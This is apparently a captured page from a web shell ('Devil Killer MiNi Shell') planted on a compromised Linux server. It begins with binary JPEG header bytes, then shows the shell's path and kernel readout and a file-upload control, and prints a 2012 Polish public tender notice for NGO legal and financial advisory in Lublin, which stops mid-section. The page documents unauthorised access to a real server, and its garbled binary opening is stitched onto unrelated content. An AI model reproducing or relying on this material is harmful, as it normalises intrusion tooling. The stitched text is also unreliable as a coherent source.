JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120215/46304-N-2012.html

<p class="kh_header"><b>Lublin: Doradztwo prawno-organizacyjne wraz z doradztwem finansowym w ramach projektu Centrum Organizacji Pozarządowych Domu Europy</b><br>
<b>Numer ogłoszenia: 46304 - 2012; data zamieszczenia: 15.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Europejskie Centrum Integracji i Współpracy Samorządowej "Dom Europy" , ul. Marii Curie-Skłodowskiej 5, 20-029 Lublin, woj. lubelskie, tel. 0-81 532 05 43, faks 0-81 463 17 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> domeuropy@lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Stowarzyszenie jednostek samorządu terytorialnego..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doradztwo prawno-organizacyjne wraz z doradztwem finansowym w ramach projektu Centrum Organizacji Pozarządowych Domu Europy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 
Przedmiotem zamówienia jest realizacja usług doradztwa prawno-organizacyjnego dla 60 organizacji pozarządowych z województwa Lubelskiego w ramach projektu Centrum Organizacji Pozarządowych Domu Europy współfinansowanego ze środków Europejskiego Funduszu Społecznego  na podstawie umowy nr UDA-POKL.05.04-00-B22-11-00 z dnia 28 listopada 2011 w ramach Programu Operacyjnego Kapitał Ludzki.. Usługi należy przeprowadzić w wymiarze co najmniej 8 godzin doradztwa prawno-organizacyjnego miesięcznie dla jednej organizacji. Łączna liczba godzin doradztwa w ramach całego projektu wynosi 80 godzin doradztwa prawno-organizacyjnego na jedną organizację, czyli 4800 godz. doradztwa na wszystkie 60 organizacji.
Zakres doradztwa obejmuje doradztwo prawno-organizacyjne dotyczące funkcjonowania organizacji pozarządowych oraz przygotowanie we współpracy z przedstawicielami organizacji kompleksowych Indywidualnych Planów Rozwoju. Indywidualne Plany Rozwoju zawierać będą analizę wewnętrznego i zewnętrznego środowiska organizacji (analiza mocnych i słabych stron oraz możliwych szans i zagrożeń), cele do osiągniecia oraz plan działań  na 5 letni okres strategiczny rozwoju organizacji. 

 Przedmiotem zamówienia jest pełnienie funkcji:

Część 1 - powiat bialski
Doradcy prawno-organizacyjnego dla 3 organizacji pozarządowych z powiatu bialskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Biała Podlaska, gmina: Biała Podlaska - 1 organizacja
Miejscowość: Dubica Dolna, gmina: Wisznice - 1 organizacja 
Miejscowość: Kodeń, gmina: Kodeń - 1 organizacja

Część 2 - powiat biłgorajski
Doradcy  prawno-organizacyjnego dla 7 organizacji pozarządowych z powiatu biłgorajskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Biszcza, gmina: Biszcza - 1 organizacja
Miejscowość: Ciosmy, gmina: Biłgoraj - 1 organizacja 
Miejscowość: Rzeczyce, gmina: Frampol - 1 organizacja
Miejscowość: Stary Bidaczów, gmina: Biłgoraj - 2 organizacje
Miejscowość: Szyszków, gmina: Potok Górny - 1 organizacja
Miejscowość: Obsza, gmina: Obsza - 1 organizacja

Część 3 - powiat chełmski
Doradcy prawno-organizacyjnego dla 1 organizacji pozarządowej z powiatu chełmskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Chełm, gmina: Chełm - 1 organizacja

Część 4 - powiat krasnostawski
Doradcy prawno-organizacyjnego dla 1 organizacji pozarządowej z powiatu krasnostawskiego  w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Krasnystaw, gmina: Krasnystaw - 1 organizacja

Część 5 - powiat kraśnicki
Doradcy prawno-organizacyjnego dla 3 organizacji pozarządowych z powiatu kraśnickiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Gościeradów Ukazowy, gmina: Gościeradów - 1 organizacja
Miejscowość: Kraśnik, gmina: Kraśnik - 1 organizacja 
Miejscowość: Urzędów, gmina: Urzędów - 1 organizacja 

Część 6 - powiat lubelski
Doradcy prawno-organizacyjnego dla 13 organizacji pozarządowych z powiatu lubelskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Garbów I, gmina: Garbów - 1 organizacja
Miejscowość: Leśce, gmina: Garbów - 1 organizacja 
Miejscowość: Lublin, gmina: Lublin - 9 organizacji
Miejscowość: Miłocin, gmina: Wojciechów - 1 organizacja
Miejscowość: Bełżyce, gmina: Bełżyce - 1 organizacja

Część 7 - powiat lubartowski
Doradcy prawno-organizacyjnego dla 2 organizacji pozarządowych z powiatu lubartowskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Lubartów, gmina: Lubartów - 1 organizacja
Miejscowość: Wola Skromowska, gmina: Firlej - 1 organizacja

Część 8 - powiat łęczyński
Doradcy prawno-organizacyjnego dla 2 organizacji pozarządowych z powiatu łęczyńskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Łęczna, gmina: Łęczna - 1 organizacja
Miejscowość: Stoczek , gmina: Spiczyn - 1 organizacja 

Część 9 - powiat parczewski
Doradcy prawno-organizacyjnego dla 2 organizacji pozarządowych z powiatu parczewskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Parczew, gmina: Parczew - 1 organizacja
Miejscowość: Rudno , gmina: Milanów - 1 organizacja 

Część 10 - powiat radzyński
Doradcy prawno-organizacyjnego dla 13 organizacji pozarządowych z powiatu radzyńskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Brzozowica Duża, gmina: Kąkolewnica - 1 organizacja
Miejscowość: Grabowiec, gmina: Kąkolewnica - 1 organizacja 
Miejscowość: Kąkolewnica, gmina: Kąkolewnica - 4 organizacje
Miejscowość: Polskowola, gmina: Kąkolewnica - 1 organizacja
Miejscowość: Radzyń Podlaski, gmina: Radzyń Podlaski - 1 organizacja 
Miejscowość: Turów, gmina: Kąkolewnica - 2 organizacje
Miejscowość: Wygnanka, gmina: Kąkolewnica - 1 organizacja
Miejscowość: Żakowola Poprzeczna, gmina: Kąkolewnica - 1 organizacja 
Miejscowość: Żakowola Stara, gmina: Kąkolewnica - 1 organizacja 

Część 11- powiat zamojski
Doradcy prawno-organizacyjnego dla 13 organizacji pozarządowych z powiatu zamojskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Dominikanówka, gmina: Krasnobród - 1 organizacja
Miejscowość: Hutki, gmina: Krasnobród - 1 organizacja 
Miejscowość: Krasnobród, gmina: Krasnobród - 2 organizacje
Miejscowość: Majdan Mały, gmina: Krasnobród - 1 organizacja
Miejscowość: Malewszczyzna, gmina: Krasnobród - 1 organizacja 
Miejscowość: Stara Huta, gmina: Krasnobród - 1 organizacja
Miejscowość: Wólka Husińska, gmina: Krasnobród - 1 organizacja
Miejscowość: Zamość, gmina: Zamość - 4 organizacje
Miejscowość: Zielone, gmina: Krasnobród - 1 organizacja 

Zadanie 2
Przedmiotem zamówienia jest realizacja usług doradztwa finansowego dla 60 organizacji pozarządowych z województwa Lubelskiego w ramach projektu Centrum Organizacji Pozarządowych Domu Europy w ramach projektu Centrum Organizacji Pozarządowych Domu Europy współfinansowanego ze środków Europejskiego Funduszu Społecznego  na podstawie umowy nr UDA-POKL.05.04-00-B22-11-00 z dnia 28 listopada 2011 w ramach Programu Operacyjnego Kapitał Ludzki.. Usługi należy przeprowadzić w wymiarze co najmniej 8 godzin doradztwa finansowego miesięcznie dla jednej organizacji. Łączna liczba godzin doradztwa w ramach całego projektu wynosi 80 godzin doradztwa finansowego na jedną organizację, czyli 4800 godz. doradztwa na wszystkie 60 organizacji.
Zakres doradztwa obejmuje doradztwo w zakresie prowadzenia rachunkowości i polityki finansowej organizacji pozarządowych oraz sprawozdawczości, rozliczenia projektów, a także prawidłowego rozliczania dokumentów projektowych wewnątrz organizacji.

Przedmiotem zamówienia jest pełnienie funkcji:

Część 1 - powiat bialski
Doradcy  finansowego dla 3 organizacji pozarządowych z powiatu bialskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Biała Podlaska, gmina: Biała Podlaska - 1 organizacja
Miejscowość: Dubica Dolna, gmina: Wisznice - 1 organizacja 
Miejscowość: Kodeń, gmina: Kodeń - 1 organizacja

Część 2 - powiat biłgorajski
Doradcy  finansowego dla 7 organizacji pozarządowych z powiatu biłgorajskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Biszcza, gmina: Biszcza - 1 organizacja
Miejscowość: Ciosmy, gmina: Biłgoraj - 1 organizacja 
Miejscowość: Rzeczyce, gmina: Frampol - 1 organizacja
Miejscowość: Stary Bidaczów, gmina: Biłgoraj - 2 organizacje
Miejscowość: Szyszków, gmina: Potok Górny - 1 organizacja
Miejscowość: Obsza, gmina: Obsza - 1 organizacja

Część 3 - powiat chełmski
Doradcy  finansowego dla 1 organizacji pozarządowej z powiatu chełmskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Chełm, gmina: Chełm - 1 organizacja

Część 4 - powiat krasnostawski
Doradcy  finansowego dla 1 organizacji pozarządowej z powiatu krasnostawskiego  w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Krasnystaw, gmina: Krasnystaw - 1 organizacja

Część 5 - powiat kraśnicki
Doradcy  finansowego dla 3 organizacji pozarządowych z powiatu kraśnickiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Gościeradów Ukazowy, gmina: Gościeradów - 1 organizacja
Miejscowość: Kraśnik, gmina: Kraśnik - 1 organizacja 
Miejscowość: Urzędów, gmina: Urzędów - 1 organizacja 

Część 6 - powiat lubelski
Doradcy  finansowego dla 13 organizacji pozarządowych z powiatu lubelskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Garbów I, gmina: Garbów - 1 organizacja
Miejscowość: Leśce, gmina: Garbów - 1 organizacja 
Miejscowość: Lublin, gmina: Lublin - 9 organizacji
Miejscowość: Miłocin, gmina: Wojciechów - 1 organizacja
Miejscowość: Bełżyce, gmina: Bełżyce - 1 organizacja

Część 7 - powiat lubartowski
Doradcy  finansowego dla 2 organizacji pozarządowych z powiatu lubartowskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Lubartów, gmina: Lubartów - 1 organizacja
Miejscowość: Wola Skromowska, gmina: Firlej - 1 organizacja

Część 8 - powiat łęczyński
Doradcy  finansowego dla 2 organizacji pozarządowych z powiatu łęczyńskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Łęczna, gmina: Łęczna - 1 organizacja
Miejscowość: Stoczek , gmina: Spiczyn - 1 organizacja 

Część 9 - powiat parczewski
Doradcy  finansowego dla 2 organizacji pozarządowych z powiatu parczewskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Parczew, gmina: Parczew - 1 organizacja
Miejscowość: Rudno , gmina: Milanów - 1 organizacja 

Część 10 - powiat radzyński
Doradcy  finansowego dla 13 organizacji pozarządowych z powiatu radzyńskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Brzozowica Duża, gmina: Kąkolewnica - 1 organizacja
Miejscowość: Grabowiec, gmina: Kąkolewnica - 1 organizacja 
Miejscowość: Kąkolewnica, gmina: Kąkolewnica - 4 organizacje
Miejscowość: Polskowola, gmina: Kąkolewnica - 1 organizacja
Miejscowość: Radzyń Podlaski, gmina: Radzyń Podlaski - 1 organizacja 
Miejscowość: Turów, gmina: Kąkolewnica - 2 organizacje
Miejscowość: Wygnanka, gmina: Kąkolewnica - 1 organizacja
Miejscowość: Żakowola Poprzeczna, gmina: Kąkolewnica - 1 organizacja 
Miejscowość: Żakowola Stara, gmina: Kąkolewnica - 1 organizacja 

Część 11 - powiat zamojski
Doradcy  finansowego dla 13 organizacji pozarządowych z powiatu zamojskiego w postaci dyżuru w siedzibie organizacji trwającego co najmniej 8 godzin miesięcznie na jedną organizację,  łącznie 80 godzin doradztwa w jednej organizacji.
Miejscowość: Dominikanówka, gmina: Krasnobród - 1 organizacja
Miejscowość: Hutki, gmina: Krasnobród - 1 organizacja 
Miejscowość: Krasnobród, gmina: Krasnobród - 2 organizacje
Miejscowość: Majdan Mały, gmina: Krasnobród - 1 organizacja
Miejscowość: Malewszczyzna, gmina: Krasnobród - 1 organizacja 
Miejscowość: Stara Huta, gmina: Krasnobród - 1 organizacja
Miejscowość: Wólka Husińska, gmina: Krasnobród - 1 organizacja
Miejscowość: Zamość, gmina: Zamość - 4 organizacje
Miejscowość: Zielone, gmina: Krasnobród - 1 organizacja 

Zadanie 3
Przedmiotem zamówienia jest realizacja usług doradztwa finansowego w Centrum Organizacji Pozarządowych w wymiarze co najmniej  40 godzin doradztwa finansowego miesięcznie w ramach projektu Centrum Organizacji Pozarządowych Domu Europy w ramach projektu Centrum Organizacji Pozarządowych Domu Europy współfinansowanego ze środków Europejskiego Funduszu Społecznego  na podstawie umowy nr UDA-POKL.05.04-00-B22-11-00 z dnia 28 listopada 2011 w ramach Programu Operacyjnego Kapitał Ludzki. Przedmiotem zamówienia są usługi na doradztwo finansowe, polegające w szczególności na:
doradztwie finansowym świadczonym w Centrum Organizacji Pozarządowych w wymiarze co najmniej  40 godzin doradztwa finansowego miesięcznie. Usługi będą świadczone w siedzibie COP w Lublinie, wskazanej przez Zamawiającego. Liczba godzin doradztwa realizowanego wynosi 400 godzin doradztwa finansowego. Zakres doradztwa obejmuje:
a.	doradztwo w zakresie prowadzenia rachunkowości podmiotów z sektora NGO;
b.	doradztwo w zakresie prowadzenia polityki finansowej podmiotów z sektora NGO;
c.	doradztwo w zakresie mechanizmów finansowania sektora NGO ze szczególnym uwzględnieniem komercyjnych i niekomercyjnych instrumentów finansowych;
d.	doradztwo w zakresie pozyskiwania środków zewnętrznych lub dotacji publicznych na działalność i zadania realizowane przez NGO.
e.	doradztwo podatkowe z uwzględnieniem specyfiki sektora NGO
f.	doradztwo w zakresie rozwoju podmiotów z sektora NGO
g.	doradztwo w zakresie prowadzenia audytów w sektorze NGO.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5, 66.17.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 23.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1
Działalność prowadzona na potrzeby wykonania przedmiotu wymaga posiadania uprawnienia do wykonywania zawodu radcy prawnego lub adwokata.
Zadanie 2
Działalność prowadzona na potrzeby wykonania przedmiotu nie wymaga posiadania specjalnych uprawnień.
Zadanie 3
Działalność prowadzona na potrzeby wykonania przedmiotu nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1
Zamawiający wymaga aby Wykonawca posiadał następujące doświadczenie i wykształcenie tj.
a.	Wykształcenie wyższe prawnicze
b.	W okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, należycie zrealizował co najmniej 1 usługę polegającą na doradztwie prawnym oraz załączeniem dokumentów potwierdzających, że usługi wskazane w wykazie zostały wykonane należycie (np. referencje, umowa o doradztwo prawne)

Zadanie 2
Zamawiający wymaga aby Wykonawca posiadał następujące doświadczenie i wykształcenie tj.
a.	Wyksztalcenie wyższe ekonomiczne lub ukończone studia podyplomowe z zakresu finansów lub rachunkowości.
b.	Doświadczenie w pracy na stanowisku obejmującym obowiązki prowadzenia finansów lub księgowości dla organizacji pozarządowych oraz posiadania wiedzy z zakresu pozyskiwania środków zewnętrznych na rzecz organizacji pozarządowych, w celu wykazania doświadczenia ww osoba powinna wykazać spełnienie łącznie  poniższych kryteriów tj.
-ukończenie co najmniej jednego szkolenia z tematyki obejmującej sprawozdawczość, rozliczenie projektów, prawidłowe rozliczanie projektu wewnątrz organizacji
-przedłożenie dokumentu  poświadczającego wykonywanie pracy lub zlecenia na stanowisku  obejmującym obowiązki prowadzenia finansów lub księgowości dla organizacji pozarządowych. 
c.	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, należycie zrealizował co najmniej 1 usługę polegającą na doradztwie finansowym oraz załączeniem dokumentów potwierdzających, że usługi wskazane w wykazie zostały wykonane należycie (np. referencje, umowa o  doradztwo finansowe)
Zadanie 3
Zamawiający wymaga aby Wykonawca posiadał następujące doświadczenie i wykształcenie tj.
a.	Wyksztalcenie wyższe ekonomiczne lub ukończone studia podyplomowe z zakresu księgowości, finansów lub rachunkowości.
b.	Doświadczenie w pracy na stanowisku obejmującym obowiązki prowadzenia finansów lub księgowości dla organizacji pozarządowych oraz posiadania wiedzy z zakresu pozyskiwania środków zewnętrznych na rzecz organizacji pozarządowych, w celu wykazania doświadczenia ww osoba powinna wykazać 
spełnienie łącznie  poniższych kryteriów tj.
-ukończenie co najmniej jednego szkolenia z tematyki  obejmującej sprawozdawczość, rozliczenie projektów, prawidłowe rozliczanie projektu wewnątrz organizacji
-przedłożenie dokumentu  poświadczającego wykonywanie pracy lub zlecenia na stanowisku  obejmującym obowiązki prowadzenia finansów lub księgowości dla organizacji pozarządowych. 
c.	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, należycie zrealizował co najmniej 1 usługę polegającą na doradztwie finansowym oraz załączeniem dokumentów potwierdzających, że usługi wskazane w wykazie zostały wykonane należycie (np. referencje, umowa o  doradztwo finansowe)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie pozostałych warunków o których mowa w art. 22 ust 1 Pzp Zamawiający nie żąda potwierdzenia ich spełnienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1
Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy wykażą, iż dysponują co najmniej jedną osobą posiadającą tj.
a.	Wyksztalcenie wyższe prawnicze
b.	Uprawnienia do wykonywania zawodu radcy prawnego lub adwokata
c.	W okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, należycie zrealizował co najmniej 1 usługę polegającą na doradztwie prawnym oraz załączeniem dokumentów potwierdzających, że usługi wskazane w wykazie zostały wykonane należycie (np. referencje, umowa o doradztwo prawne)

Zadanie 2
Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy wykażą, iż dysponują co najmniej jedną osobą posiadającą uprawnienia do wykonywania zawodu specjalisty z zakresu prowadzenia finansów lub księgowości dla organizacji pozarządowych, która posiada tj.
a.	Wyksztalcenie wyższe ekonomiczne lub ukończone studia podyplomowe z zakresu finansów lub rachunkowości.
b.	Doświadczenie w pracy na stanowisku obejmującym obowiązki prowadzenia finansów lub księgowości dla organizacji pozarządowych oraz posiadania wiedzy z zakresu pozyskiwania środków zewnętrznych na rzecz organizacji pozarządowych, w celu wykazania doświadczenia ww osoba powinna wykazać spełnienie łącznie  poniższych kryteriów tj. 
-ukończenie co najmniej jednego szkolenia z tematyki obejmującej sprawozdawczość, rozliczenie projektów, prawidłowe rozliczanie projektu wewnątrz organizacji
-przedłożenie dokumentu  poświadczającego wykonywanie pracy lub zlecenia na stanowisku  obejmującym obowiązki prowadzenia finansów lub księgowości dla organizacji pozarządowych. 
c.w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, należycie zrealizował co najmniej 1 usługę polegającą na doradztwie finansowym oraz załączeniem dokumentów potwierdzających, że usługi wskazane w wykazie zostały wykonane należycie (np. referencje, umowa o doradztwo finansowe)

Zadanie 3
Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy wykażą, iż dysponują co najmniej jedną osobą posiadającą uprawnienia do wykonywania zawodu specjalisty z zakresu prowadzenia finansów lub księgowości dla organizacji pozarządowych, która posiada tj.
